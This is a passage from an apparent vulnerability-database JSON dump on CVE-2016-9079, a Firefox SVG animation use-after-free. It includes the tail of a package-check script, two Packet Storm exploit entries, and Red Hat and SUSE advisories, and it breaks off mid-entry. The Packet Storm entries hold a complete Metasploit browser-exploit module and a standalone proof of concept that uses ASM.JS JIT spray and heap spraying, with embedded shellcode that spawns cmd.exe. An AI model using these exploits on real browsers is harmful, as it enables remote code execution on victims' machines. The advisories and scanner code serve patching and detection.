rpm:\"mozilla-nss-debugsource~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-devel\", rpm:\"mozilla-nss-devel~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-sysinit\", rpm:\"mozilla-nss-sysinit~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-sysinit-debuginfo\", rpm:\"mozilla-nss-sysinit-debuginfo~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-tools\", rpm:\"mozilla-nss-tools~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-tools-debuginfo\", rpm:\"mozilla-nss-tools-debuginfo~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3-32bit\", rpm:\"libfreebl3-32bit~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3-debuginfo-32bit\", rpm:\"libfreebl3-debuginfo-32bit~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsoftokn3-32bit\", rpm:\"libsoftokn3-32bit~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsoftokn3-debuginfo-32bit\", rpm:\"libsoftokn3-debuginfo-32bit~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-32bit\", rpm:\"mozilla-nss-32bit~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-certs-32bit\", rpm:\"mozilla-nss-certs-32bit~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-certs-debuginfo-32bit\", rpm:\"mozilla-nss-certs-debuginfo-32bit~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-debuginfo-32bit\", rpm:\"mozilla-nss-debuginfo-32bit~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-sysinit-32bit\", rpm:\"mozilla-nss-sysinit-32bit~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-sysinit-debuginfo-32bit\", rpm:\"mozilla-nss-sysinit-debuginfo-32bit~3.26.2~94.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2017-01-24T03:04:21", "description": "", "cvss3": {}, "published": "2017-01-24T00:00:00", "type": "packetstorm", "title": "Firefox nsSMILTimeContainer::NotifyTimeChange() Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2017-01-24T00:00:00", "id": "PACKETSTORM:140696", "href": "https://packetstormsecurity.com/files/140696/Firefox-nsSMILTimeContainer-NotifyTimeChange-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Firefox nsSMILTimeContainer::NotifyTimeChange() RCE\", \n'Description' => %q{ \nThis module exploits an out-of-bounds indexing/use-after-free condition present in \nnsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox \non Microsoft Windows. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Anonymous Gaijin', # Original research/exploit \n'William Webb <william_webb[at]rapid7.com>' # Metasploit module \n], \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Mozilla Firefox', \n{ \n'Platform' => 'win', \n'Arch' => ARCH_X86, \n} \n], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => \"thread\", \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'References' => \n[ \n[ 'CVE', '2016-9079' ], \n[ 'Bugzilla', '1321066' ] \n], \n'Arch' => ARCH_X86, \n'DisclosureDate' => \"Nov 30 2016\", \n'DefaultTarget' => 0 \n) \n) \nregister_options( \n[ \nOptBool.new('UsePostHTML', [ true, 'Rewrite page with arbitrary HTML after successful exploitation. NOTE: if set to true, you should probably rewrite data/exploits/ff_smil_uaf/post.html to something useful!', false ]), \n], self.class \n) \nend \n \ndef exploit_html(cli) \np = payload.encoded \narch = Rex::Arch.endian(target.arch) \npayload_final = Rex::Text.to_unescape(p, arch, prefix='\\\\u') \nbase_uri = \"#{get_resource.chomp('/')}\" \n \n# stuff that gets adjusted alot during testing \n \ndefrag_x = %Q~ \nfor (var i = 0; i < 0x4000; i++) \nheap80[i] = block80.slice(0) \n~ \ndefrag_y = %Q~ \nfor (var i = 0x4401; i < heap80.length; i++) \nheap80[i] = block80.slice(0) \n~ \n \njs = %Q~ \nvar worker = new Worker('#{base_uri}/worker.js'); \nvar svgns = 'http://www.w3.org/2000/svg'; \nvar heap80 = new Array(0x5000); \nvar heap100 = new Array(0x5000); \nvar block80 = new ArrayBuffer(0x80); \nvar block100 = new ArrayBuffer(0x100); \nvar sprayBase = undefined; \nvar arrBase = undefined; \n \nvar animateX = undefined; \nvar containerA = undefined; \n \nvar milestone_offset = 0x90; \n \nvar $ = function(id) { return document.getElementById(id); } \n \nvar heap = function() \n{ \nvar u32 = new Uint32Array(block80) \n \nu32[4] = arrBase - milestone_offset; \n \nu32[0xa] = arrBase + 0x1000 - milestone_offset; \n \nu32[0x10] = arrBase + 0x2000 - milestone_offset; \n \nvar x = document.createElementNS(svgns, 'animate') \nvar svg = document.createElementNS(svgns, 'svg') \n \nsvg.appendChild(x) \nsvg.appendChild(x.cloneNode(true)) \n \nfor (var i = 0; i < 0x400; i++) \n{ \nvar node = svg.cloneNode(true); \nnode.setAttribute('id', 'svg' + i) \ndocument.body.appendChild(node); \n} \n#{defrag_x} \n \nfor (var i = 0; i < 0x400; i++) \n{ \nheap80[i + 0x3000] = block80.slice(0) \n$('svg' + i).appendChild(x.cloneNode(true)) \n} \n \nfor (var i = 0; i < 0x400; i++) \n{ \n$('svg' + i).appendChild(x.cloneNode(true)) \n$('svg' + i).appendChild(x.cloneNode(true)) \n} \n \nfor (var i = 0; i < heap100.length; i++) \nheap100[i] = block100.slice(0) \n \n#{defrag_y} \n \nfor (var i = 0x100; i < 0x400; i++) \n$('svg' + i).appendChild(x.cloneNode(true)) \n} \n \nvar exploit = function() \n{ \nheap(); \n \nanimateX.setAttribute('begin', '59s') \nanimateX.setAttribute('begin', '58s') \nanimateX.setAttribute('begin', '10s') \nanimateX.setAttribute('begin', '9s') \n \n// money shot \n \ncontainerA.pauseAnimations(); \n} \n \nworker.onmessage = function(e) \n{ \nworker.onmessage = function(e) \n{ \nwindow.setTimeout(function() \n{ \nworker.terminate(); \ndocument.body.innerHTML = ''; \ndocument.getElementsByTagName('head')[0].innerHTML = ''; \ndocument.body.setAttribute('onload', '') \ndocument.write('<blink>') \n}, 1000); \n} \n \narrBase = e.data; \nexploit(); \n} \n \n \nvar idGenerator = function() \n{ \nreturn 'id' + (((1+Math.random())*0x10000)|0).toString(16).substring(1); \n} \n \n \nvar craftDOM = function() \n{ \ncontainerA = document.createElementNS(svgns, 'svg') \nvar containerB = document.createElementNS(svgns, 'svg'); \n \nanimateX = document.createElementNS(svgns, 'animate') \nvar animateA = document.createElementNS(svgns, 'animate') \nvar animateB = document.createElementNS(svgns, 'animate') \n \nvar animateC = document.createElementNS(svgns, 'animate') \n \nvar idX = idGenerator(); \nvar idA = idGenerator(); \nvar idB = idGenerator(); \nvar idC = idGenerator(); \n \nanimateX.setAttribute('id', idX); \nanimateA.setAttribute('id', idA); \nanimateA.setAttribute('end', '50s'); \nanimateB.setAttribute('id', idB); \nanimateB.setAttribute('begin', '60s'); \nanimateB.setAttribute('end', idC + '.end'); \nanimateC.setAttribute('id', idC); \nanimateC.setAttribute('begin', '10s'); \nanimateC.setAttribute('end', idA + '.end'); \n \ncontainerA.appendChild(animateX) \ncontainerA.appendChild(animateA) \ncontainerA.appendChild(animateB) \n \ncontainerB.appendChild(animateC) \n \ndocument.body.appendChild(containerA); \ndocument.body.appendChild(containerB); \n} \nwindow.onload = craftDOM; \n~ \n \n# If you want to change the appearance of the landing page, do it here \n \nhtml = %Q~ \n<html> \n<head> \n<meta charset=\"utf-8\"/> \n<script> \n#{js} \n</script> \n</head> \n<body> \n</body> \n</html> \n~ \n \nif datastore['UsePostHTML'] \nf = File.open(File.join(Msf::Config.data_directory, \"exploits\", \"firefox_smil_uaf\", \"post.html\"), \"rb\") \nc = f.read \nhtml = html.gsub(\"<blink>\", c) \nelse \nhtml = html.gsub(\"<blink>\", \"\") \nend \nsend_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' }) \nend \n \ndef worker_js(cli) \np = payload.encoded \narch = Rex::Arch.endian(target.arch) \npayload = Rex::Text.to_unescape(p, arch) \nwt = File.open(File.join(Msf::Config.data_directory, \"exploits\", \"firefox_smil_uaf\", \"worker.js\"), \"rb\") \nc = wt.read \nc = c.gsub(\"INSERTSHELLCODEHEREPLZ\", payload) \nc = c.gsub(\"NOPSGOHERE\", \"\\u9090\") \nsend_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' }) \nend \n \ndef is_ff_on_windows(user_agent) \ntarget_hash = fingerprint_user_agent(user_agent) \nif target_hash[:ua_name] !~ /Firefox/ or target_hash[:os_name] !~ /Windows/ \nreturn false \nend \nreturn true \nend \n \ndef on_request_uri(cli, request) \nprint_status(\"Got request: #{request.uri}\") \nprint_status(\"From: #{request.headers['User-Agent']}\") \nif (!is_ff_on_windows(request.headers['User-Agent'])) \nprint_error(\"Unsupported user agent: #{request.headers['User-Agent']}\") \nsend_not_found(cli) \nclose_client(cli) \nreturn \nend \nif request.uri =~ /worker\\.js/ \nprint_status(\"Sending worker thread Javascript ...\") \nworker_js(cli) \nreturn \nend \nif request.uri =~ /index\\.html/ or request.uri =~ /\\// \n \nprint_status(\"Sending exploit HTML ...\") \nexploit_html(cli) \nclose_client(cli) \nreturn \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/140696/firefox_smil_uaf.rb.txt"}, {"lastseen": "2017-07-15T22:47:02", "description": "", "cvss3": {}, "published": "2017-07-14T00:00:00", "type": "packetstorm", "title": "Firefox 50.0.1 ASM.JS JIT-Spray Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-9079", "CVE-2017-5375"], "modified": "2017-07-14T00:00:00", "id": "PACKETSTORM:143373", "href": "https://packetstormsecurity.com/files/143373/Firefox-50.0.1-ASM.JS-JIT-Spray-Remote-Code-Execution.html", "sourceData": "`<!DOCTYPE HTML> \n \n<!-- \n \nFULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375) \nPoC Exploit against Firefox 50.0.1 (CVE-2016-9079 - Tor Browser 0day) \n \nTested on: \n \nRelease 50.0.1 32-bit - Windows 8.1 / Windows 10 \nhttps://ftp.mozilla.org/pub/firefox/releases/50.0.1/win32/en-US/Firefox%20Setup%2050.0.1.exe \n \nHowto: \n \n1) serve PoC over network and open it in Firefox 50.0.1 32-bit \n2) if you don't see cmd.exe, open processexplorer and verify that cmd.exe was spawned by firefox.exe \n \nA successfull exploit attempt should pop cmd.exe \n \nWriteup: https://rh0dev.github.io/blog/2017/the-return-of-the-jit/ \n \n(C) Rh0 \n \nJul. 13, 2017 \n \n--> \n \n<script async> \nfunction asm_js_module(){ \n\"use asm\"; \n/* huge jitted nop sled */ \nfunction payload_code(){ \nvar val = 0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \n/* 3 byte VirtualAlloc RWX stager */ \nval = (val + 0xa890db31)|0; \nval = (val + 0xa89030b3)|0; \nval = (val + 0xa81b8b64)|0; \nval = (val + 0xa80c5b8b)|0; \nval = (val + 0xa81c5b8b)|0; \nval = (val + 0xa8b9006a)|0; \nval = (val + 0xa8904c4c)|0; \nval = (val + 0xa8902eb1)|0; \nval = (val + 0xa85144b5)|0; \nval = (val + 0xa8b99090)|0; \nval = (val + 0xa8903233)|0; \nval = (val + 0xa89045b1)|0; \nval = (val + 0xa8514cb5)|0; \nval = (val + 0xa8b99090)|0; \nval = (val + 0xa8904e52)|0; \nval = (val + 0xa8904bb1)|0; \nval = (val + 0xa85145b5)|0; \nval = (val + 0xa8590e6a)|0; \nval = (val + 0xa84fe789)|0; \nval = (val + 0xa8086b8b)|0; \nval = (val + 0xa820738b)|0; \nval = (val + 0xa8471b8b)|0; \nval = (val + 0xa82ae349)|0; \nval = (val + 0xa890c031)|0; \nval = (val + 0xa890ad66)|0; \nval = (val + 0xa89c613c)|0; \nval = (val + 0xa8077c9d)|0; \nval = (val + 0xa890202c)|0; \nval = (val + 0xa89c073a)|0; \nval = (val + 0xa8d7749d)|0; \nval = (val + 0xa890bdeb)|0; \nval = (val + 0xa8b9006a)|0; \nval = (val + 0xa890636f)|0; \nval = (val + 0xa8906cb1)|0; \nval = (val + 0xa8516cb5)|0; \nval = (val + 0xa8b99090)|0; \nval = (val + 0xa890416c)|0; \nval = (val + 0xa89075b1)|0; \nval = (val + 0xa85161b5)|0; \nval = (val + 0xa8b99090)|0; \nval = (val + 0xa8907472)|0; \nval = (val + 0xa89056b1)|0; \nval = (val + 0xa85169b5)|0; \nval = (val + 0xa890eb89)|0; \nval = (val + 0xa83cc583)|0; \nval = (val + 0xa8006d8b)|0; \nval = (val + 0xa890dd01)|0; \nval = (val + 0xa878c583)|0; \nval = (val + 0xa8006d8b)|0; \nval = (val + 0xa890dd01)|0; \nval = (val + 0xa820458b)|0; \nval = (val + 0xa890d801)|0; \nval = (val + 0xa890d231)|0; \nval = (val + 0xa890e789)|0; \nval = (val + 0xa8590d6a)|0; \nval = (val + 0xa810348b)|0; \nval = (val + 0xa890de01)|0; \nval = (val + 0xa890a6f3)|0; \nval = (val + 0xa8900de3)|0; \nval = (val + 0xa804c283)|0; \nval = (val + 0xa890dbeb)|0; \nval = (val + 0xa8247d8b)|0; \nval = (val + 0xa890df01)|0; \nval = (val + 0xa890ead1)|0; \nval = (val + 0xa890d701)|0; \nval = (val + 0xa890d231)|0; \nval = (val + 0xa8178b66)|0; \nval = (val + 0xa81c7d8b)|0; \nval = (val + 0xa890df01)|0; \nval = (val + 0xa802e2c1)|0; \nval = (val + 0xa890d701)|0; \nval = (val + 0xa8903f8b)|0; \nval = (val + 0xa890df01)|0; \nval = (val + 0xa890406a)|0; \nval = (val + 0xa890c031)|0; \nval = (val + 0xa85030b4)|0; \nval = (val + 0xa85010b4)|0; \nval = (val + 0xa890006a)|0; \nval = (val + 0xa890d7ff)|0; \nval = (val + 0xa890c931)|0; \nval = (val + 0xa89000b5)|0; \nval = (val + 0xa890c3b1)|0; \nval = (val + 0xa890ebd9)|0; \nval = (val + 0xa82434d9)|0; \nval = (val + 0xa890e689)|0; \nval = (val + 0xa80cc683)|0; \nval = (val + 0xa890368b)|0; \nval = (val + 0xa85fc683)|0; \nval = (val + 0xa890c789)|0; \nval = (val + 0xa81e8b66)|0; \nval = (val + 0xa81f8966)|0; \nval = (val + 0xa802c683)|0; \nval = (val + 0xa802c783)|0; \nval = (val + 0xa8901e8a)|0; \nval = (val + 0xa8901f88)|0; \nval = (val + 0xa803c683)|0; \nval = (val + 0xa801c783)|0; \nval = (val + 0xa803e983)|0; \nval = (val + 0xa89008e3)|0; \nval = (val + 0xa890cceb)|0; \nval = (val + 0xa890e0ff)|0; \nval = (val + 0xa824248d)|0; \n/* $ msfvenom --payload windows/exec CMD=cmd.exe EXITFUNC=seh */ \nval = (val + 0xa882e8fc)|0; \nval = (val + 0xa8000000)|0; \nval = (val + 0xa8e58960)|0; \nval = (val + 0xa864c031)|0; \nval = (val + 0xa830508b)|0; \nval = (val + 0xa80c528b)|0; \nval = (val + 0xa814528b)|0; \nval = (val + 0xa828728b)|0; \nval = (val + 0xa84ab70f)|0; \nval = (val + 0xa8ff3126)|0; \nval = (val + 0xa8613cac)|0; \nval = (val + 0xa82c027c)|0; \nval = (val + 0xa8cfc120)|0; \nval = (val + 0xa8c7010d)|0; \nval = (val + 0xa852f2e2)|0; \nval = (val + 0xa8528b57)|0; \nval = (val + 0xa84a8b10)|0; \nval = (val + 0xa84c8b3c)|0; \nval = (val + 0xa8e37811)|0; \nval = (val + 0xa8d10148)|0; \nval = (val + 0xa8598b51)|0; \nval = (val + 0xa8d30120)|0; \nval = (val + 0xa818498b)|0; \nval = (val + 0xa8493ae3)|0; \nval = (val + 0xa88b348b)|0; \nval = (val + 0xa831d601)|0; \nval = (val + 0xa8c1acff)|0; \nval = (val + 0xa8010dcf)|0; \nval = (val + 0xa8e038c7)|0; \nval = (val + 0xa803f675)|0; \nval = (val + 0xa83bf87d)|0; \nval = (val + 0xa875247d)|0; \nval = (val + 0xa88b58e4)|0; \nval = (val + 0xa8012458)|0; \nval = (val + 0xa88b66d3)|0; \nval = (val + 0xa88b4b0c)|0; \nval = (val + 0xa8011c58)|0; \nval = (val + 0xa8048bd3)|0; \nval = (val + 0xa8d0018b)|0; \nval = (val + 0xa8244489)|0; \nval = (val + 0xa85b5b24)|0; \nval = (val + 0xa85a5961)|0; \nval = (val + 0xa8e0ff51)|0; \nval = (val + 0xa85a5f5f)|0; \nval = (val + 0xa8eb128b)|0; \nval = (val + 0xa86a5d8d)|0; \nval = (val + 0xa8858d01)|0; \nval = (val + 0xa80000b2)|0; \nval = (val + 0xa8685000)|0; \nval = (val + 0xa86f8b31)|0; \nval = (val + 0xa8d5ff87)|0; \nval = (val + 0xa80efebb)|0; \nval = (val + 0xa868ea32)|0; \nval = (val + 0xa8bd95a6)|0; \nval = (val + 0xa8d5ff9d)|0; \nval = (val + 0xa87c063c)|0; \nval = (val + 0xa8fb800a)|0; \nval = (val + 0xa80575e0)|0; \nval = (val + 0xa81347bb)|0; \nval = (val + 0xa86a6f72)|0; \nval = (val + 0xa8ff5300)|0; \nval = (val + 0xa86d63d5)|0; \nval = (val + 0xa8652e64)|0; \nval = (val + 0xa8006578)|0; \nval = (val + 0xa8909090)|0; \n \nreturn val|0; \n} \nreturn payload_code \n} \n</script> \n \n<script> \nfunction spray_asm_js_modules(){ \nsprayed = [] \nfor (var i=0; i<= 0x1800; i++){ \nsprayed[i] = asm_js_module() \n} \n} \n \n/* heap spray inspired by skylined */ \nfunction heap_spray_fake_objects(){ \nvar heap = [] \nvar current_address = 0x08000000 \nvar block_size = 0x1000000 \nwhile(current_address < object_target_address){ \nvar heap_block = new Uint32Array(block_size/4 - 0x100) \nfor (var offset = 0; offset < block_size; offset += 0x100000){ \n \n/* fake object target = ecx + 0x88 and fake vtable*/ \nheap_block[offset/4 + 0x00/4] = object_target_address \n/* self + 4 */ \nheap_block[offset/4 + 0x14/4] = object_target_address \n/* the path to EIP */ \nheap_block[offset/4 + 0x18/4] = 4 \nheap_block[offset/4 + 0xac/4] = 1 \n/* fake virtual function --> JIT target */ \nheap_block[offset/4 + 0x138/4] = jit_payload_target \n} \nheap.push(heap_block) \ncurrent_address += block_size \n} \nreturn heap \n} \n \n/* address of fake object */ \nobject_target_address = 0x30300000 \n \n/* address of our jitted shellcode */ \njit_payload_target = 0x1c1c0054 \n \n/* ASM.JS JIT Spray */ \nspray_asm_js_modules() \n \n/* Spray fake objects */ \nheap = heap_spray_fake_objects() \n \n/* -----> */ \n/* bug trigger ripped from bugzilla report */ \nvar worker = new Worker('data:javascript,self.onmessage=function(msg){postMessage(\"one\");postMessage(\"two\");};'); \nworker.postMessage(\"zero\"); \nvar svgns = 'http://www.w3.org/2000/svg'; \nvar heap80 = new Array(0x1000); \nvar heap100 = new Array(0x4000); \nvar block80 = new ArrayBuffer(0x80); \nvar block100 = new ArrayBuffer(0x100); \nvar sprayBase = undefined; \nvar arrBase = undefined; \nvar animateX = undefined; \nvar containerA = undefined; \nvar offset = 0x88 // Firefox 50.0.1 \n \nvar exploit = function(){ \nvar u32 = new Uint32Array(block80) \n \nu32[0x4] = arrBase - offset; \nu32[0xa] = arrBase - offset; \nu32[0x10] = arrBase - offset; \n \nfor(i = heap100.length/2; i < heap100.length; i++) \n{ \nheap100[i] = block100.slice(0) \n} \n \nfor(i = 0; i < heap80.length/2; i++) \n{ \nheap80[i] = block80.slice(0) \n} \n \nanimateX.setAttribute('begin', '59s') \nanimateX.setAttribute('begin', '58s') \n \nfor(i = heap80.length/2; i < heap80.length; i++) \n{ \nheap80[i] = block80.slice(0) \n} \n \nfor(i = heap100.length/2; i < heap100.length; i++) \n{ \nheap100[i] = block100.slice(0) \n} \n \nanimateX.setAttribute('begin', '10s') \nanimateX.setAttribute('begin', '9s') \ncontainerA.pauseAnimations(); \n} \n \nworker.onmessage = function(e) {arrBase=object_target_address; exploit()} \n//worker.onmessage = function(e) {arrBase=0x30300000; exploit()} \n \nvar trigger = function(){ \ncontainerA = document.createElementNS(svgns, 'svg') \nvar containerB = document.createElementNS(svgns, 'svg'); \nanimateX = document.createElementNS(svgns, 'animate') \nvar animateA = document.createElementNS(svgns, 'animate') \nvar animateB = document.createElementNS(svgns, 'animate') \nvar animateC = document.createElementNS(svgns, 'animate') \nvar idA = \"ia\"; \nvar idC = \"ic\"; \nanimateA.setAttribute('id', idA); \nanimateA.setAttribute('end', '50s'); \nanimateB.setAttribute('begin', '60s'); \nanimateB.setAttribute('end', idC + '.end'); \nanimateC.setAttribute('id', idC); \nanimateC.setAttribute('end', idA + '.end'); \ncontainerA.appendChild(animateX) \ncontainerA.appendChild(animateA) \ncontainerA.appendChild(animateB) \ncontainerB.appendChild(animateC) \ndocument.body.appendChild(containerA); \ndocument.body.appendChild(containerB); \n} \n \nwindow.onload = trigger; \nsetInterval(\"window.location.reload()\", 3000) \n/* <----- */ \n \n</script> \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/143373/firefox5001-exec.txt"}], "redhat": [{"lastseen": "2021-10-19T18:41:23", "description": "Mozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.5.1 ESR.\n\nSecurity Fix(es):\n\n* A flaw was found in the processing of malformed web content. A web page\ncontaining malicious content could cause Firefox to crash or, potentially,\nexecute arbitrary code with the privileges of the user running Firefox.\n(CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this issue.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-01T00:00:00", "type": "redhat", "title": "(RHSA-2016:2843) Critical: firefox security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2018-06-06T16:24:15", "id": "RHSA-2016:2843", "href": "https://access.redhat.com/errata/RHSA-2016:2843", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-19T18:41:18", "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 45.5.1.\n\nSecurity Fix(es):\n\n* A flaw was found in the processing of malformed web content. A web page\ncontaining malicious content could cause Thunderbird to crash or, potentially,\nexecute arbitrary code with the privileges of the user running Thunderbird.\n(CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this issue.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-05T00:00:00", "type": "redhat", "title": "(RHSA-2016:2850) Important: thunderbird security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2018-06-06T16:24:24", "id": "RHSA-2016:2850", "href": "https://access.redhat.com/errata/RHSA-2016:2850", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "suse": [{"lastseen": "2021-06-08T18:39:54", "description": "This update contains Mozilla Thunderbird 45.5.1 and fixes one\n vulnerability.\n\n In Mozilla Thunderbird, this vulnerability may be exploited when used in a\n browser-like context.\n\n - CVE-2016-9079: SVG Animation Remote Code Execution (MFSA 2016-92,\n bsc#1012964, bmo#1321066)\n\n", "cvss3": {}, "published": "2016-12-04T22:06:50", "type": "suse", "title": "Security update for Mozilla Thunderbird (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2016-12-04T22:06:50", "id": "OPENSUSE-SU-2016:2991-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00005.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T18:39:46", "description": "This update for MozillaFirefox fixes security issues.\n\n The following vulnerabilities were fixed in Firefox ESR 45.5.1\n (bbsc#1012964):\n\n - CVE-2016-9079: Use-after-free in SVG Animation could be used for code\n execution (MFSA 2016-92 bsc#1012964)\n\n", "cvss3": {}, "published": "2016-12-07T21:07:02", "type": "suse", "title": "Security update for MozillaFirefox (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2016-12-07T21:07:02", "id": "SUSE-SU-2016:3048-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00024.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T18:39:45", "description": "MozillaFirefox is updated to version 50.0.2 which fixes the following\n issues:\n\n * Firefox crashed with 3rd party Chinese IME when using IME 